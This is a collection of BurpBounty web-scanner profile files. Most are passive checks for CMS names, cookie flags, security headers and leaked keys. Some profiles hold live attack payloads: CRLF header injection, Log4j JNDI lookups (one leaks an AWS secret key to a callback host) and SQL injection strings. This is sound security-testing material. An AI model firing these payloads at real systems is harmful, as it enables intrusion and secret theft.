"true,Or,OXID eSales",
"true,Or,Octopress",
"true,Or,Odoo",
"true,Or,One.com",
"true,Or,Open CMS",
"true,Or,Open Journal Systems",
"true,Or,OpenNemas",
"true,Or,OpenOffice",
"true,Or,Orchard",
"true,Or,Orthodox Web Solutions",
"true,Or,Osclass",
"true,Or,Overblog",
"true,Or,Oxatis",
"true,Or,PHP-Fusion",
"true,Or,PHP-Nuke",
"true,Or,PHP Link Directory",
"true,Or,PHPShop",
"true,Or,PHPVibe",
"true,Or,PageCloud",
"true,Or,Pagekit",
"true,Or,Pangea CMS",
"true,Or,Parallels Presence Builder",
"true,Or,Pelican",
"true,Or,Perch",
"true,Or,Percussion",
"true,Or,Pimcore",
"true,Or,Piwigo",
"true,Or,Plone",
"true,Or,PowerBoutique",
"true,Or,PrestaShop",
"true,Or,ProcessWire",
"true,Or,Pydio",
"true,Or,Quick.CMS",
"true,Or,Quick.Cart",
"true,Or,RCMS",
"true,Or,RVsitebuilder",
"true,Or,RapidWeaver",
"true,Or,Ready Pro Ecommerce",
"true,Or,Ruby on Rails",
"true,Or,SNworks",
"true,Or,SUMOshop",
"true,Or,Salesforce",
"true,Or,Sana Commerce",
"true,Or,Sandvox",
"true,Or,SchoolSitePro",
"true,Or,Seamless CMS",
"true,Or,SeoToaster",
"true,Or,Serendipity",
"true,Or,Setup.ru",
"true,Or,SharePoint",
"true,Or,ShopFactory",
"true,Or,Shopify",
"true,Or,Shoptet",
"true,Or,Shopware",
"true,Or,Showoff",
"true,Or,SilverStripe CMS",
"true,Or,Simple Machines Forum",
"true,Or,Siquando",
"true,Or,SiteDirect",
"true,Or,SiteKreator",
"true,Or,SitePad",
"true,Or,SiteSpinner",
"true,Or,Sitefinity",
"true,Or,Sitonline",
"true,Or,Sitoo",
"true,Or,SmartEtailing",
"true,Or,SmartStore.NET",
"true,Or,SmugMug",
"true,Or,SocialEngine",
"true,Or,Sparkle CMS",
"true,Or,Spip",
"true,Or,Squarespace",
"true,Or,Squiz",
"true,Or,Strikingly",
"true,Or,Sulu CMS",
"true,Or,Tailbase",
"true,Or,Tangora Web CMS",
"true,Or,Telligent",
"true,Or,Tempest",
"true,Or,Textalk Webshop",
"true,Or,Textpattern CMS",
"true,Or,ThinkCMF",
"true,Or,ThinkPHP",
"true,Or,Ticimax",
"true,Or,Tiki Wiki CMS",
"true,Or,Tilda",
"true,Or,Trellix",
"true,Or,Tumblr",
"true,Or,TypePad",
"true,Or,Typecho",
"true,Or,Typesetter",
"true,Or,Typo3",
"true,Or,UBB.threads",
"true,Or,UMI.CMS",
"true,Or,Ultimize CMS",
"true,Or,Umbraco",
"true,Or,Vanilla Forums",
"true,Or,Vigbo",
"true,Or,Vision",
"true,Or,Visual Studio",
"true,Or,Visualsoft",
"true,Or,Vivvo",
"true,Or,Volusion",
"true,Or,WMaker",
"true,Or,WYSIWYG Web Builder",
"true,Or,Web 2 Date",
"true,Or,WebAcappella",
"true,Or,Web Commander",
"true,Or,WebGUI",
"true,Or,Web Page Maker",
"true,Or,WebPlus",
"true,Or,Web Presence Builder",
"true,Or,Web Shop Manager",
"true,Or,WebSite Tonight",
"true,Or,WebSphere Studio Homepage Builder",
"true,Or,Webflow",
"true,Or,Weblication",
"true,Or,Webs",
"true,Or,Websale",
"true,Or,WebsiteBuilder",
"true,Or,WebSite X5",
"true,Or,Websplanet",
"true,Or,Webvision",
"true,Or,Weebly",
"true,Or,Wheel CMS",
"true,Or,Wikispaces",
"true,Or,Wix",
"true,Or,WiziShop",
"true,Or,WoltLab",
"true,Or,XT-Commerce",
"true,Or,Xara",
"true,Or,XenForo",
"true,Or,Xiuno BBS",
"true,Or,Xoops",
"true,Or,XpressEngine",
"true,Or,X‑Cart",
"true,Or,YaBB",
"true,Or,Yahoo Small Business",
"true,Or,Yellow Pages Canada",
"true,Or,Yola",
"true,Or,ZMS",
"true,Or,Zen Cart",
"true,Or,Zendesk",
"true,Or,Zoho Sites",
"true,Or,Zyro",
"true,Or,b2evolution",
"true,Or,blog.ir",
"true,Or,cloudrexx",
"true,Or,concrete5",
"true,Or,docsify",
"true,Or,dotCMS",
"true,Or,e107",
"true,Or,ePages",
"true,Or,eSyndiCat",
"true,Or,eZ Publish",
"true,Or,elcomCMS",
"true,Or,fCMS",
"true,Or,iWeb",
"true,Or,kimsq",
"true,Or,nopCommerce",
"true,Or,onpublix CMS",
"true,Or,1C-Bitrix",
"true,Or,pTools",
"true,Or,phpwcms",
"true,Or,phpwind",
"true,Or,plentymarkets",
"true,Or,uCoz"
],
"Tags": [
"All"
],
"PayloadResponse": false,
"NotResponse": false,
"TimeOut1": "",
"TimeOut2": "",
"isTime": false,
"contentLength": "",
"iscontentLength": false,
"CaseSensitive": false,
"ExcludeHTTP": false,
"OnlyHTTP": true,
"IsContentType": true,
"ContentType": "text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2",
"HttpResponseCode": "",
"NegativeCT": true,
"IsResponseCode": false,
"ResponseCode": "",
"NegativeRC": false,
"urlextension": "",
"isurlextension": false,
"NegativeUrlExtension": false,
"MatchType": 1,
"Scope": 2,
"RedirType": 0,
"MaxRedir": 0,
"payloadPosition": 0,
"payloadsFile": "",
"grepsFile": "",
"IssueName": "CMS Detected",
"IssueSeverity": "Information",
"IssueConfidence": "Firm",
"IssueDetail": "CMS Detected",
"RemediationDetail": "CMS Detected",
"IssueBackground": "CMS Detected",
"RemediationBackground": "CMS Detected",
"Header": [],
"VariationAttributes": [],
"InsertionPointType": [],
"Scanas": false,
"Scantype": 0,
"pathDiscovery": false
}
] |
BitBake | BurpBounty/profiles/CodeClimate_Key.bb | [
{
"ProfileName": "CodeClimate_Key",
"Name": "",
"Enabled": true,
"Scanner": 2,
"Author": "@six2dez1",
"Payloads": [],
"Encoder": [],
"UrlEncode": false,
"CharsToUrlEncode": "",
"Grep": [
"true,,(?i)codeclima.{0,50}(\\\\\\\"|\u0027|`)?[0-9a-f]{64}(\\\\\\\"|\u0027|`)?"
],
"Tags": [
"All"
],
"PayloadResponse": false,
"NotResponse": false,
"TimeOut1": "",
"TimeOut2": "",
"isTime": false,
"contentLength": "",
"iscontentLength": false,
"CaseSensitive": false,
"ExcludeHTTP": false,
"OnlyHTTP": false,
"IsContentType": true,
"ContentType": "text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2",
"HttpResponseCode": "",
"NegativeCT": true,
"IsResponseCode": false,
"ResponseCode": "",
"NegativeRC": false,
"urlextension": "",
"isurlextension": false,
"NegativeUrlExtension": false,
"MatchType": 2,
"Scope": 2,
"RedirType": 0,
"MaxRedir": 0,
"payloadPosition": 0,
"payloadsFile": "",
"grepsFile": "",
"IssueName": "CodeClimate Key",
"IssueSeverity": "Information",
"IssueConfidence": "Certain",
"IssueDetail": "",
"RemediationDetail": "",
"IssueBackground": "",
"RemediationBackground": "",
"Header": [],
"VariationAttributes": [],
"InsertionPointType": [],
"Scanas": false,
"Scantype": 0,
"pathDiscovery": false
}
] |
BitBake | BurpBounty/profiles/Content-Security-Policy.bb | [
{
"ProfileName": "Content-Security-Policy",
"Name": "",
"Enabled": true,
"Scanner": 2,
"Author": "@egarme",
"Payloads": [],
"Encoder": [],
"UrlEncode": false,
"CharsToUrlEncode": "",
"Grep": [
"true,,Content-Security-Policy"
],
"Tags": [
"All"
],
"PayloadResponse": false,
"NotResponse": true,
"TimeOut1": "",
"TimeOut2": "",
"isTime": false,
"contentLength": "",
"iscontentLength": false,
"CaseSensitive": false,
"ExcludeHTTP": false,
"OnlyHTTP": false,
"IsContentType": false,
"ContentType": "",
"HttpResponseCode": "",
"NegativeCT": false,
"IsResponseCode": false,
"ResponseCode": "",
"NegativeRC": false,
"urlextension": "",
"isurlextension": false,
"NegativeUrlExtension": false,
"MatchType": 1,
"Scope": 1,
"RedirType": 0,
"MaxRedir": 0,
"payloadPosition": 0,
"payloadsFile": "",
"grepsFile": "",
"IssueName": "Content-Security-Policy",
"IssueSeverity": "Information",
"IssueConfidence": "Firm",
"IssueDetail": "Security Header \"Content-Security-Policy\" not present in response.",
"RemediationDetail": "",
"IssueBackground": "",
"RemediationBackground": "",
"Header": [],
"VariationAttributes": [],
"InsertionPointType": [],
"Scanas": false,
"Scantype": 0,
"pathDiscovery": false
}
] |
BitBake | BurpBounty/profiles/CookieAttrubute-HttpOnly.bb | [
{
"ProfileName": "CookieAttrubute-HttpOnly",
"Name": "",
"Enabled": true,
"Scanner": 2,
"Author": "@egarme",
"Payloads": [],
"Encoder": [],
"UrlEncode": false,
"CharsToUrlEncode": "",
"Grep": [
"true,,set-cookie:\\s*(?!.*(httponly)).*"
],
"Tags": [
"All"
],
"PayloadResponse": false,
"NotResponse": false,
"TimeOut1": "",
"TimeOut2": "",
"isTime": false,
"contentLength": "",
"iscontentLength": false,
"CaseSensitive": false,
"ExcludeHTTP": false,
"OnlyHTTP": false,
"IsContentType": false,
"ContentType": "",
"HttpResponseCode": "",
"NegativeCT": false,
"IsResponseCode": false,
"ResponseCode": "",
"NegativeRC": false,
"urlextension": "",
"isurlextension": false,
"NegativeUrlExtension": false,
"MatchType": 2,
"Scope": 2,
"RedirType": 0,
"MaxRedir": 0,
"payloadPosition": 0,
"payloadsFile": "",
"grepsFile": "",
"IssueName": "CookieAttrubute-HttpOnly",
"IssueSeverity": "Low",
"IssueConfidence": "Firm",
"IssueDetail": "Cookie attribute \"HttpOnly\" not present: \u003cbr\u003e \u003cgrep\u003e",
"RemediationDetail": "",
"IssueBackground": "",
"RemediationBackground": "",
"Header": [],
"VariationAttributes": [],
"InsertionPointType": [],
"Scanas": false,
"Scantype": 0,
"pathDiscovery": false
}
] |
BitBake | BurpBounty/profiles/CookieAttrubute-SameSite.bb | [
{
"ProfileName": "CookieAttrubute-SameSite",
"Name": "",
"Enabled": true,
"Scanner": 2,
"Author": "@egarme",
"Payloads": [],
"Encoder": [],
"UrlEncode": false,
"CharsToUrlEncode": "",
"Grep": [
"true,,set-cookie:\\s*(?!.*(samesite)).*"
],
"Tags": [
"All"
],
"PayloadResponse": false,
"NotResponse": false,
"TimeOut1": "",
"TimeOut2": "",
"isTime": false,
"contentLength": "",
"iscontentLength": false,
"CaseSensitive": false,
"ExcludeHTTP": false,
"OnlyHTTP": false,
"IsContentType": false,
"ContentType": "",
"HttpResponseCode": "",
"NegativeCT": false,
"IsResponseCode": false,
"ResponseCode": "",
"NegativeRC": false,
"urlextension": "",
"isurlextension": false,
"NegativeUrlExtension": false,
"MatchType": 2,
"Scope": 2,
"RedirType": 0,
"MaxRedir": 0,
"payloadPosition": 0,
"payloadsFile": "",
"grepsFile": "",
"IssueName": "CookieAttrubute-SameSite",
"IssueSeverity": "Information",
"IssueConfidence": "Firm",
"IssueDetail": "Cookie attribute \"Samesite\" not present: \u003cbr\u003e \u003cgrep\u003e",
"RemediationDetail": "",
"IssueBackground": "",
"RemediationBackground": "",
"Header": [],
"VariationAttributes": [],
"InsertionPointType": [],
"Scanas": false,
"Scantype": 0,
"pathDiscovery": false
}
] |
BitBake | BurpBounty/profiles/CookieAttrubute-Secure.bb | [
{
"ProfileName": "CookieAttrubute-Secure",
"Name": "",
"Enabled": true,
"Scanner": 2,
"Author": "@egarme",
"Payloads": [],
"Encoder": [],
"UrlEncode": false,
"CharsToUrlEncode": "",
"Grep": [
"true,,set-cookie:\\s*(?!.*(secure)).*"
],
"Tags": [
"All"
],
"PayloadResponse": false,
"NotResponse": false,
"TimeOut1": "",
"TimeOut2": "",
"isTime": false,
"contentLength": "",
"iscontentLength": false,
"CaseSensitive": false,
"ExcludeHTTP": false,
"OnlyHTTP": false,
"IsContentType": false,
"ContentType": "",
"HttpResponseCode": "",
"NegativeCT": false,
"IsResponseCode": false,
"ResponseCode": "",
"NegativeRC": false,
"urlextension": "",
"isurlextension": false,
"NegativeUrlExtension": false,
"MatchType": 2,
"Scope": 2,
"RedirType": 0,
"MaxRedir": 0,
"payloadPosition": 0,
"payloadsFile": "",
"grepsFile": "",
"IssueName": "CookieAttrubute-Secure",
"IssueSeverity": "Low",
"IssueConfidence": "Firm",
"IssueDetail": "Cookie attribute \"secure\" not present: \u003cbr\u003e\u003cgrep\u003e\n\n",
"RemediationDetail": "",
"IssueBackground": "",
"RemediationBackground": "",
"Header": [],
"VariationAttributes": [],
"InsertionPointType": [],
"Scanas": false,
"Scantype": 0,
"pathDiscovery": false
}
] |
BitBake | BurpBounty/profiles/CRLF-Attack.bb | [
{
"ProfileName": "CRLF-Attack",
"Name": "",
"Enabled": true,
"Scanner": 1,
"Author": "@egarme",
"Payloads": [
"true,%0D%0ASet-Cookie:%20mycookie\u003dmyvalue"
],
"Encoder": [],
"UrlEncode": false,
"CharsToUrlEncode": "",
"Grep": [
"true,, ^Set-Cookie:\\smycookie\u003dmyvalue"
],
"Tags": [
"All"
],
"PayloadResponse": false,
"NotResponse": false,
"TimeOut1": "",
"TimeOut2": "",
"isTime": false,
"contentLength": "",
"iscontentLength": false,
"CaseSensitive": false,
"ExcludeHTTP": false,
"OnlyHTTP": true,
"IsContentType": false,
"ContentType": "",
"HttpResponseCode": "",
"NegativeCT": false,
"IsResponseCode": false,
"ResponseCode": "",
"NegativeRC": false,
"urlextension": "",
"isurlextension": false,
"NegativeUrlExtension": false,
"MatchType": 1,
"Scope": 0,
"RedirType": 3,
"MaxRedir": 3,
"payloadPosition": 1,
"payloadsFile": "",
"grepsFile": "",
"IssueName": "CRLF-Attack",
"IssueSeverity": "Medium",
"IssueConfidence": "Certain",
"IssueDetail": "",
"RemediationDetail": "",
"IssueBackground": "",
"RemediationBackground": "",
"Header": [],
"VariationAttributes": [],
"InsertionPointType": [
18,
65,
32,
36,
7,
1,
2,
6,
33,
5,
35,
34,
64,
0,
3,
4,
37,
127,
65,
32,
36,
7,
1,
2,
6,
33,
5,
35,
34,
64,
0,
3,
4,
37,
127
],
"Scanas": false,
"Scantype": 0,
"pathDiscovery": false
}
] |
BitBake | BurpBounty/profiles/CVE-2021-44228_RCE_Log4j_WAF.bb | [
{
"ProfileName": "CVE-2021-44228_RCE_Log4j_WAF",
"Name": "",
"Enabled": true,
"Scanner": 1,
"Author": "@egarme",
"Payloads": [
"true,${jndi:ldap://{BC}/b}",
"true,$%7Bjndi:ldap://{BC}/b%7D ",
"true,${jndi:dns://{BC}/b}",
"true,${jndi:${lower:l}${lower:d}a${lower:p}://{BC}/b",
"true,${jndi:ldap://${env:AWS_SECRET_ACCESS_KEY}.{BC}/b}",
"true,${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://{BC}/aa}",
"true,${${::-j}ndi:rmi://{BC}/aa}"
],
"Encoder": [],
"UrlEncode": false,
"CharsToUrlEncode": "",
"Grep": [],
"Tags": [
"Log4j",
"All"
],
"PayloadResponse": false,
"NotResponse": false,
"TimeOut1": "",
"TimeOut2": "",
"isTime": false,
"contentLength": "",
"iscontentLength": false,
"CaseSensitive": false,
"ExcludeHTTP": false,
"OnlyHTTP": false,
"IsContentType": false,
"ContentType": "",
"HttpResponseCode": "",
"NegativeCT": false,
"IsResponseCode": false,
"ResponseCode": "",
"NegativeRC": false,
"urlextension": "",
"isurlextension": false,
"NegativeUrlExtension": false,
"MatchType": 0,
"Scope": 0,
"RedirType": 0,
"MaxRedir": 0,
"payloadPosition": 1,
"payloadsFile": "",
"grepsFile": "",
"IssueName": "CVE-2021-44228_RCE_Log4j_WAF ",
"IssueSeverity": "High",
"IssueConfidence": "Firm",
"IssueDetail": "",
"RemediationDetail": "",
"IssueBackground": "",
"RemediationBackground": "",
"Header": [],
"VariationAttributes": [],
"InsertionPointType": [
18,
65,
32,
36,
7,
1,
2,
6,
33,
5,
35,
34,
64,
0,
3,
4,
37,
127,
65,
32,
36,
7,
1,
2,
6,
33,
5,
35,
34,
64,
0,
3,
4,
37,
127
],
"Scanas": false,
"Scantype": 0,
"pathDiscovery": false
}
] |
BitBake | BurpBounty/profiles/DefaultRDP.bb | [
{
"ProfileName": "DefaultRDP",
"Name": "",
"Enabled": true,
"Scanner": 2,
"Author": "@egarme",
"Payloads": [],
"Encoder": [],
"UrlEncode": false,
"CharsToUrlEncode": "",
"Grep": [
"true,,default.rdp"
],
"Tags": [
"All"
],
"PayloadResponse": false,
"NotResponse": false,
"TimeOut1": "",
"TimeOut2": "",
"isTime": false,
"contentLength": "",
"iscontentLength": false,
"CaseSensitive": false,
"ExcludeHTTP": false,
"OnlyHTTP": false,
"IsContentType": false,
"ContentType": "",
"HttpResponseCode": "",
"NegativeCT": false,
"IsResponseCode": false,
"ResponseCode": "",
"NegativeRC": false,
"urlextension": "",
"isurlextension": false,
"NegativeUrlExtension": false,
"MatchType": 1,
"Scope": 2,
"RedirType": 0,
"MaxRedir": 0,
"payloadPosition": 0,
"payloadsFile": "",
"grepsFile": "",
"IssueName": "DefaultRDP",
"IssueSeverity": "Information",
"IssueConfidence": "Firm",
"IssueDetail": "Default RDP Found:\u003cbr\u003e\n\nhttps://www.exploit-db.com/ghdb/5023/",
"RemediationDetail": "",
"IssueBackground": "",
"RemediationBackground": "",
"Header": [],
"VariationAttributes": [],
"InsertionPointType": [],
"Scanas": false,
"Scantype": 0,
"pathDiscovery": false
}
] |
BitBake | BurpBounty/profiles/DigitalOcean_Space_Discovered.bb | [
{
"ProfileName": "DigitalOcean_Space_Discovered",
"Name": "",
"Enabled": true,
"Scanner": 2,
"Author": "@six2dez1",
"Payloads": [],
"Encoder": [],
"UrlEncode": false,
"CharsToUrlEncode": "",
"Grep": [
"true,,http(?:s)://[^\u003e\u003c\\.\\\u0027\\\" \\n\\)]+.[^\u003e\u003c\\.\\\u0027\\\" \\n\\)]+.[^\u003e\u003c\\.\\\u0027\\\" \\n\\)]+.digitaloceanspaces.com"
],
"Tags": [
"All"
],
"PayloadResponse": false,
"NotResponse": false,
"TimeOut1": "",
"TimeOut2": "",
"isTime": false,
"contentLength": "",
"iscontentLength": false,
"CaseSensitive": false,
"ExcludeHTTP": false,
"OnlyHTTP": false,
"IsContentType": true,
"ContentType": "text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2",
"HttpResponseCode": "",
"NegativeCT": true,
"IsResponseCode": false,
"ResponseCode": "",
"NegativeRC": false,
"urlextension": "",
"isurlextension": false,
"NegativeUrlExtension": false,
"MatchType": 2,
"Scope": 2,
"RedirType": 0,
"MaxRedir": 0,
"payloadPosition": 0,
"payloadsFile": "",
"grepsFile": "",
"IssueName": "DigitalOcean Space Discovered",
"IssueSeverity": "Information",
"IssueConfidence": "Certain",
"IssueDetail": "",
"RemediationDetail": "",
"IssueBackground": "",
"RemediationBackground": "",
"Header": [],
"VariationAttributes": [],
"InsertionPointType": [],
"Scanas": false,
"Scantype": 0,
"pathDiscovery": false
}
] |
BitBake | BurpBounty/profiles/DirectoryListing.bb | [
{
"ProfileName": "DirectoryListing",
"Name": "",
"Enabled": true,
"Scanner": 2,
"Author": "@egarme",
"Payloads": [],
"Encoder": [],
"UrlEncode": false,
"CharsToUrlEncode": "",
"Grep": [
"true,,Index of /"
],
"Tags": [
"All"
],
"PayloadResponse": false,
"NotResponse": false,
"TimeOut1": "",
"TimeOut2": "",
"isTime": false,
"contentLength": "",
"iscontentLength": false,
"CaseSensitive": false,
"ExcludeHTTP": false,
"OnlyHTTP": false,
"IsContentType": false,
"ContentType": "",
"HttpResponseCode": "",
"NegativeCT": false,
"IsResponseCode": false,
"ResponseCode": "",
"NegativeRC": false,
"urlextension": "",
"isurlextension": false,
"NegativeUrlExtension": false,
"MatchType": 1,
"Scope": 2,
"RedirType": 0,
"MaxRedir": 0,
"payloadPosition": 0,
"payloadsFile": "",
"grepsFile": "",
"IssueName": "DirectoryListing",
"IssueSeverity": "Information",
"IssueConfidence": "Firm",
"IssueDetail": "Directory Listing found",
"RemediationDetail": "",
"IssueBackground": "",
"RemediationBackground": "",
"Header": [],
"VariationAttributes": [],
"InsertionPointType": [],
"Scanas": false,
"Scantype": 0,
"pathDiscovery": false
}
] |
BitBake | BurpBounty/profiles/Drupalgeddon.bb | [
{
"ProfileName": "Drupalgeddon",
"Name": "",
"Enabled": true,
"Scanner": 2,
"Author": "@egarme",
"Payloads": [],
"Encoder": [],
"UrlEncode": false,
"CharsToUrlEncode": "",
"Grep": [
"true,,\\/user\\/register.*Powered by Drupal"
],
"Tags": [
"All"
],
"PayloadResponse": false,
"NotResponse": false,
"TimeOut1": "",
"TimeOut2": "",
"isTime": false,
"contentLength": "",
"iscontentLength": false,
"CaseSensitive": false,
"ExcludeHTTP": false,
"OnlyHTTP": false,
"IsContentType": false,
"ContentType": "",
"HttpResponseCode": "",
"NegativeCT": false,
"IsResponseCode": false,
"ResponseCode": "",
"NegativeRC": false,
"urlextension": "",
"isurlextension": false,
"NegativeUrlExtension": false,
"MatchType": 2,
"Scope": 2,
"RedirType": 0,
"MaxRedir": 0,
"payloadPosition": 0,
"payloadsFile": "",
"grepsFile": "",
"IssueName": "Drupalgeddon",
"IssueSeverity": "High",
"IssueConfidence": "Firm",
"IssueDetail": "Possible Drupalgeddon 2 or 3:\u003cbr\u003e\n\n\u003cbr\u003ehttps://www.exploit-db.com/ghdb/4782/\n\n\u003cbr\u003ehttps://www.exploit-db.com/exploits/44482/\n\n\u003cbr\u003ehttps://www.exploit-db.com/exploits/44557/\n",
"RemediationDetail": "",
"IssueBackground": "",
"RemediationBackground": "",
"Header": [],
"VariationAttributes": [],
"InsertionPointType": [],
"Scanas": false,
"Scantype": 0,
"pathDiscovery": false
}
] |
BitBake | BurpBounty/profiles/EmailInput.bb | [
{
"ProfileName": "EmailInput",
"Name": "",
"Enabled": true,
"Scanner": 3,
"Author": "@egarme",
"Payloads": [],
"Encoder": [],
"UrlEncode": false,
"CharsToUrlEncode": "",
"Grep": [
"true,,All Request,Value,type\u003demail"
],
"Tags": [
"All"
],
"PayloadResponse": false,
"NotResponse": false,
"TimeOut1": "",
"TimeOut2": "",
"isTime": false,
"contentLength": "",
"iscontentLength": false,
"CaseSensitive": false,
"ExcludeHTTP": false,
"OnlyHTTP": false,
"IsContentType": false,
"ContentType": "",
"HttpResponseCode": "",
"NegativeCT": false,
"IsResponseCode": false,
"ResponseCode": "",
"NegativeRC": false,
"urlextension": "",
"isurlextension": false,
"NegativeUrlExtension": false,
"MatchType": 1,
"Scope": 0,
"RedirType": 0,
"MaxRedir": 0,
"payloadPosition": 0,
"payloadsFile": "",
"grepsFile": "",
"IssueName": "EmailInput",
"IssueSeverity": "Information",
"IssueConfidence": "Firm",
"IssueDetail": "Email Input Found",
"RemediationDetail": "",
"IssueBackground": "",
"RemediationBackground": "",
"Header": [],
"VariationAttributes": [],
"InsertionPointType": [],
"Scanas": false,
"Scantype": 0,
"pathDiscovery": false
}
] |
BitBake | BurpBounty/profiles/EndpointsExtractor.bb | [
{
"ProfileName": "EndpointsExtractor",
"Name": "",
"Enabled": true,
"Scanner": 2,
"Author": "@GochaOqradze",
"Payloads": [],
"Encoder": [],
"UrlEncode": false,
"CharsToUrlEncode": "",
"Grep": [
"false,,}\\.[a-zA-Z]{2,}[^\"\u0027]{0,})|((?:/|\\.\\./|\\./)[^\"\u0027\u003e\u003c,;| *()(%%$^/\\\\\\[\\]][^\"\u0027\u003e\u003c,;|()]{1,})|([a-zA-Z0-9_\\-/]{1,}/[a-zA-Z0-9_\\-/]{1,}\\.(?:[a-zA-Z]{1,4}|action)(?:[\\?|/][^\"|\u0027]{0,}|))|([a-zA-Z0-9_\\-]{1,}\\.(?:php|asp|aspx|jsp|json|action|html|js|txt|xml)(?:\\?[^\"|\u0027]{0,}|)))(?:\"|\u0027)"
],
"Tags": [
"All"
],
"PayloadResponse": false,
"NotResponse": false,
"TimeOut1": "",
"TimeOut2": "",
"isTime": false,
"contentLength": "",
"iscontentLength": false,
"CaseSensitive": false,
"ExcludeHTTP": true,
"OnlyHTTP": false,
"IsContentType": false,
"ContentType": "",
"HttpResponseCode": "",
"NegativeCT": false,
"IsResponseCode": false,
"ResponseCode": "",
"NegativeRC": false,
"urlextension": "",
"isurlextension": false,
"NegativeUrlExtension": false,
"MatchType": 2,
"Scope": 2,
"RedirType": 0,
"MaxRedir": 0,
"payloadPosition": 0,
"payloadsFile": "",
"grepsFile": "",
"IssueName": "EndpointsExtractor",
"IssueSeverity": "Information",
"IssueConfidence": "Firm",
"IssueDetail": "Regex by Gerben_Javado : \n\u003cbr\u003ehttps://github.com/GerbenJavado/LinkFinder/blob/master/linkfinder.py\n\n\u003cbr\u003e\u003cbr\u003eEndpoints: \u003cbr\u003e\u003cgrep\u003e",
"RemediationDetail": "",
"IssueBackground": "",
"RemediationBackground": "",
"Header": [],
"VariationAttributes": [],
"InsertionPointType": [],
"Scanas": false,
"Scantype": 0,
"pathDiscovery": false
}
] |
BitBake | BurpBounty/profiles/Env_Vars.bb | [
{
"ProfileName": "Env_Vars",
"Name": "",
"Enabled": true,
"Scanner": 2,
"Author": "@six2dez1",
"Payloads": [],
"Encoder": [],
"UrlEncode": false,
"CharsToUrlEncode": "",
"Grep": [
"true,,(?i)(apikey|secret|key|api|password|pass|pw|host)\u003d[0-9a-zA-Z-_.{}]{4,120}"
],
"Tags": [
"All"
],
"PayloadResponse": false,
"NotResponse": false,
"TimeOut1": "",
"TimeOut2": "",
"isTime": false,
"contentLength": "",
"iscontentLength": false,
"CaseSensitive": false,
"ExcludeHTTP": false,
"OnlyHTTP": false,
"IsContentType": true,
"ContentType": "text/css,image/jpeg,image/png,image/svg+xml,image/gif,image/tiff,image/webp,image/x-icon,application/font-woff,image/vnd.microsoft.icon,font/ttf,font/woff2",
"HttpResponseCode": "",
"NegativeCT": true,
"IsResponseCode": false,
"ResponseCode": "",
"NegativeRC": false,
"urlextension": "",
"isurlextension": false,
"NegativeUrlExtension": false,
"MatchType": 2,
"Scope": 2,
"RedirType": 0,
"MaxRedir": 0,
"payloadPosition": 0,
"payloadsFile": "",
"grepsFile": "",
"IssueName": "Environment Variables",
"IssueSeverity": "Information",
"IssueConfidence": "Certain",
"IssueDetail": "",
"RemediationDetail": "",
"IssueBackground": "",
"RemediationBackground": "",
"Header": [],
"VariationAttributes": [],
"InsertionPointType": [],
"Scanas": false,
"Scantype": 0,
"pathDiscovery": false
}
] |
BitBake | BurpBounty/profiles/ErrorPages-JobApps.bb | [
{
"ProfileName": "ErrorPages-JobApps",
"Name": "",
"Enabled": true,
"Scanner": 3,
"Author": "@egarme",
"Payloads": [],
"Encoder": [],
"UrlEncode": false,
"CharsToUrlEncode": "",
"Grep": [
"true,,All Request,Value,syd_apply.cfm"
],
"Tags": [
"Errors",
"All"
],
"PayloadResponse": false,
"NotResponse": false,
"TimeOut1": "",
"TimeOut2": "",
"isTime": false,
"contentLength": "",
"iscontentLength": false,
"CaseSensitive": false,
"ExcludeHTTP": false,
"OnlyHTTP": false,
"IsContentType": false,
"ContentType": "",
"HttpResponseCode": "",
"NegativeCT": false,
"IsResponseCode": false,
"ResponseCode": "",
"NegativeRC": false,
"urlextension": "",
"isurlextension": false,
"NegativeUrlExtension": false,
"MatchType": 1,
"Scope": 0,
"RedirType": 0,
"MaxRedir": 0,
"payloadPosition": 0,
"payloadsFile": "",
"grepsFile": "",
"IssueName": "ErrorPages-JobApps",
"IssueSeverity": "Information",
"IssueConfidence": "Firm",
"IssueDetail": "Find error pages for job applications, sometimes can contain juicy information:\u003cbr\u003e\n\nhttps://www.exploit-db.com/ghdb/5033/",
"RemediationDetail": "",
"IssueBackground": "",
"RemediationBackground": "",
"Header": [],
"VariationAttributes": [],
"InsertionPointType": [],
"Scanas": false,
"Scantype": 0,
"pathDiscovery": false
}
] |
BitBake | BurpBounty/profiles/ErrorSQLi.bb | [
{
"ProfileName": "ErrorSQLi",
"Name": "",
"Enabled": true,
"Scanner": 1,
"Author": "@egarme",
"Payloads": [
"true,\u0027-\u0027",
"true,\u0027 \u0027",
"true,\u0027\u0026\u0027",
"true,\u0027^\u0027",
"true,\u0027*\u0027",
"true,\u0027 or \u0027\u0027-\u0027",
"true,\u0027 or \u0027\u0027 \u0027",
"true,\u0027 or \u0027\u0027\u0026\u0027",
"true,\u0027 or \u0027\u0027^\u0027",
"true,\u0027 or \u0027\u0027*\u0027",
"true,\"-\"",
"true,\" \"",
"true,\"\u0026\"",
"true,\"^\"",
"true,\"*\"",
"true,\" or \"\"-\"",
"true,\" or \"\" \"",
"true,\" or \"\"\u0026\"",
"true,\" or \"\"^\"",
"true,\" or \"\"*\"",
"true,or true--",
"true,\" or true--",
"true,\u0027 or true--",
"true,\") or true--",
"true,\u0027) or true--",
"true,\u0027 or \u0027x\u0027\u003d\u0027x",
"true,\u0027) or (\u0027x\u0027)\u003d(\u0027x",
"true,\u0027)) or ((\u0027x\u0027))\u003d((\u0027x",
"true,\" or \"x\"\u003d\"x",
"true,\") or (\"x\")\u003d(\"x",
"true,\")) or ((\"x\"))\u003d((\"x",
"true,or 1\u003d1",
"true,or 1\u003d1-- ",
"true,or 1\u003d1#",
"true,or 1\u003d1/*"
],
"Encoder": [],
"UrlEncode": false,
"CharsToUrlEncode": "",
"Grep": [
"true,,Microsoft OLE DB Provider for ODBC Drivers error",
"true,Or,You have an error in your SQL syntax",
"true,Or,ORA-00933: SQL command not properly ended",
"true,Or,Microsoft SQL Native Client error",
"true,Or,Query failed: ERROR: syntax error at or near",
"true,Or,You have an error in your SQL syntax",
"true,Or,MySQL Error: 1064\" \u0026 \"Session halted",
"true,Or,mysql error with query",
"true,Or,sQL syntax error",
